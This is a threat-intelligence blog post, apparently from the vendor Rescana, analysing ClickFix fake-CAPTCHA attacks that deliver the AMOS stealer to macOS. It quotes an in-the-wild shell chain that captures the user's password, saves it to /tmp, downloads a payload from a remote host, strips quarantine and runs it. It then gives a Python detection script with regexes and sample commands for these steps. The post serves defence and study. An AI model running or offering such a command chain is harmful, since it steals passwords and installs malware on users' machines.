Evolving ClickFix Attacks Targeting macOS: Social Engineering, Multi-Platform Payloads, and Credential Theft
- Rescana
- Nov 9
- 4 min read

Executive Summary
ClickFix attacks represent a significant and rapidly evolving threat vector targeting macOS users, leveraging advanced social engineering and multi-platform payload delivery. These attacks utilize deceptive verification pages, dynamic OS detection, and psychological manipulation to coerce users into executing malicious terminal commands. The primary objective is credential theft, data exfiltration, and the deployment of sophisticated malware such as Atomic macOS Stealer (AMOS) and Lumma Stealer. Recent campaigns have demonstrated a marked increase in both scale and technical sophistication, with active exploitation observed across North America and Europe. The threat landscape is further complicated by the involvement of multiple advanced persistent threat (APT) groups and cybercriminal syndicates, making ClickFix a critical concern for organizations and individuals operating within the macOS ecosystem.
Threat Actor Profile
The ClickFix attack methodology has been adopted by a diverse array of threat actors, including both financially motivated cybercriminals and state-aligned APT groups. Notably, Microsoft has attributed recent campaigns to groups tracked as Storm-1607, Storm-0426, and Storm-0249. These actors are characterized by their agility in adopting new social engineering techniques and their ability to rapidly weaponize emerging vulnerabilities. Russian-speaking cybercriminal forums have been identified as primary distribution hubs for AMOS and related stealer malware, with actors leveraging underground marketplaces to disseminate payloads and share attack infrastructure. The operational tempo of these groups is high, with campaigns frequently pivoting between different lures, payloads, and delivery mechanisms to maximize infection rates and evade detection.
Technical Analysis of Malware/TTPs
ClickFix attacks are distinguished by their use of dynamic, OS-aware landing pages that generate tailored payloads based on the victim's environment. Upon visiting a compromised or malicious site, users are presented with a fake verification or CAPTCHA page, often branded to mimic trusted services such as Cloudflare or Google reCAPTCHA. JavaScript on the page detects the user's operating system and presents a corresponding command for the user to execute in their terminal (for macOS and Linux) or PowerShell/Run dialog (for Windows).
For macOS users, the attack chain typically involves a command sequence that prompts for the user's system password, validates it, and then downloads and executes a malicious binary. A representative command observed in the wild is as follows:
```bash
username=$(whoami)
# loop until the entered password validates against Directory Services
while true; do
  read -s -p "System Password: " password
  echo
  dscl . -authonly "$username" "$password" && break
done
# store the captured password, fetch the payload, strip quarantine, run it
echo "$password" > /tmp/.pass
curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update
echo "$password" | sudo -S xattr -c /tmp/update
chmod +x /tmp/update
/tmp/update
```
This sequence captures the user's password, stores it locally, retrieves the AMOS payload from a remote server, removes quarantine attributes, and executes the binary with elevated privileges. The AMOS stealer is capable of exfiltrating browser credentials, cryptocurrency wallet data, and detailed system information. Additional payloads observed include Lumma Stealer, Lampion, and various remote access trojans (RATs) such as Xworm and AsyncRAT.
On Windows systems, analogous techniques are employed using PowerShell or MSHTA to fetch and execute payloads, often leveraging living-off-the-land binaries (LOLBins) to evade endpoint detection. The attack infrastructure is highly modular, with command-and-control (C2) domains and payload URLs frequently rotated to avoid blacklisting.
Exploitation in the Wild
Active ClickFix campaigns have been documented since early 2025, with a notable surge in activity targeting macOS users in May and June. One high-profile campaign impersonated Spectrum, a major US internet service provider, redirecting users to fake verification pages that delivered the AMOS stealer. The Lampion campaign targeted government and financial institutions in Portugal, Switzerland, France, Hungary, and Mexico, leveraging compromised WordPress sites and malvertising to distribute payloads.
The OBSCURE#BAT campaign utilized Discord-themed lures to deliver the r77 rootkit and other malware, demonstrating the adaptability of ClickFix techniques across different social engineering themes. Microsoft and other security vendors have observed a marked increase in the use of video tutorials, countdown timers, and real-time "user verification" counters to enhance the credibility of malicious landing pages and increase user compliance.
Victimology and Targeting
ClickFix attacks exhibit broad targeting, with a focus on sectors including government, finance, education, transportation, and enterprise environments. End-user devices are particularly vulnerable due to the reliance on user interaction for payload execution. Geographically, the United States, Canada, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, and Germany have been disproportionately affected, reflecting both the global reach of the campaigns and the attackers' preference for high-value targets.
The attack is not dependent on specific macOS versions; any system capable of executing terminal commands and downloading files via curl or wget is at risk. This includes macOS Sonoma (14.x), Ventura (13.x), Monterey (12.x), Big Sur (11.x), Catalina (10.15), Mojave (10.14), and High Sierra (10.13), among others.
Mitigation and Countermeasures
Mitigating ClickFix attacks requires a multi-layered approach combining technical controls, user education, and proactive threat hunting. Organizations should monitor for suspicious clipboard and terminal activity, particularly commands involving curl, wget, or password prompts. Blocking known indicators of compromise (IOCs) at both the network and endpoint level is essential, as is hunting for unusual process launches such as /tmp/update on macOS or PowerShell with encoded commands on Windows.
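The command chain above and the hunting guidance in this section translate directly into detection logic over process-execution telemetry. The following is an added example, not Rescana's own tooling or a vendor rule: it applies one regex per stage of the macOS chain (download into /tmp, quarantine attribute stripped, execution from /tmp, shell-side password validation via dscl, download piped into a shell) to constructed sample command lines and flags a user whose activity matches either a standalone high-signal stage or two or more chained stages. The events, user names and the example.invalid domain are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed sample of process-execution telemetry, in the shape an EDR or a
# macOS unified-log query might return. Not real data: users and the
# example.invalid domain are placeholders.
SAMPLE_EVENTS = [
    {"user": "alice", "cmd": "brew update"},
    {"user": "alice", "cmd": "curl -o /tmp/update https://example.invalid/getrur/update"},
    {"user": "alice", "cmd": "xattr -c /tmp/update"},
    {"user": "alice", "cmd": "/tmp/update"},
    {"user": "bob",   "cmd": "curl -fsSL https://example.invalid/install.sh | sh"},
    {"user": "bob",   "cmd": "git pull"},
    {"user": "carol", "cmd": "dscl . -authonly carol REDACTED"},
    {"user": "dave",  "cmd": "ls -la /tmp"},
]

# One rule per stage of the chain described in the report. Each regex is
# applied to the raw command line; the names are the labels reported back.
RULES = [
    # curl/wget writing a download into a temp directory
    ("download_to_tmp", re.compile(r"\b(curl|wget)\b.*\s(/private)?/(var/)?tmp/")),
    # quarantine attribute removed (xattr -c, or -d com.apple.quarantine)
    ("quarantine_strip", re.compile(r"\bxattr\b.*\s(-c\b|-d\s+com\.apple\.quarantine)")),
    # a binary launched directly from /tmp
    ("exec_from_tmp", re.compile(r"^(/private)?/tmp/\S+")),
    # password validated against Directory Services from a shell
    ("dscl_authonly", re.compile(r"\bdscl\b.*\s-authonly\b")),
    # download piped straight into a shell interpreter
    ("curl_pipe_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
]

# Rules that are alarming on their own; the others only when chained.
STANDALONE = {"dscl_authonly", "curl_pipe_shell"}


def match_rules(cmd):
    """Return the names of every rule whose pattern matches a command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def score_sessions(events):
    """Group rule hits per user and decide whether the activity looks like a
    ClickFix chain: any standalone rule, or two or more distinct stages."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["user"]].update(match_rules(ev["cmd"]))
    result = {}
    for user, names in hits.items():
        suspicious = bool(names & STANDALONE) or len(names) >= 2
        result[user] = {"hits": sorted(names), "suspicious": suspicious}
    return result


if __name__ == "__main__":
    for user, verdict in score_sessions(SAMPLE_EVENTS).items():
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{user:6} {flag:10} {', '.join(verdict['hits']) or '-'}")
```

Running the block prints one verdict per user: alice is flagged because three stages of the chain appear in sequence, bob and carol because a single high-signal stage (curl piped to sh, dscl -authonly from a shell) is enough on its own, while dave's `ls -la /tmp` produces no hits. In production the same rules would run over EDR process events rather than a hard-coded list, and the two-stage threshold keeps an isolated `curl -o /tmp/...` from paging an analyst by itself.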
User awareness is critical: no legitimate service will ever request that users execute terminal commands for verification purposes. Regular security training should emphasize the dangers of copying and pasting commands from untrusted sources. All content management system (CMS) plugins, especially for platforms like WordPress, should be kept up to date to prevent site compromise and subsequent malvertising.
Endpoint detection and response (EDR) and extended detection and response (XDR) solutions, such as Microsoft Defender and Sentinel, have developed specific detections for ClickFix-related behaviors. Organizations are encouraged to leverage these tools and to implement custom detection rules based on the latest threat intelligence.
References
- Microsoft Security Blog: ClickFix Analysis
- eSecurity Planet: ClickFix Malware Evolves
- CloudSEK: AMOS via ClickFix
- Securonix: OBSCURE#BAT Analysis
About Rescana
Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to proactively identify, assess, and mitigate cyber threats across their digital supply chain. Our platform leverages real-time intelligence, automated risk scoring, and comprehensive reporting to enhance your organization's security posture and resilience against emerging threats. For further information or to discuss how Rescana can support your cybersecurity strategy, we are happy to answer questions at ops@rescana.com.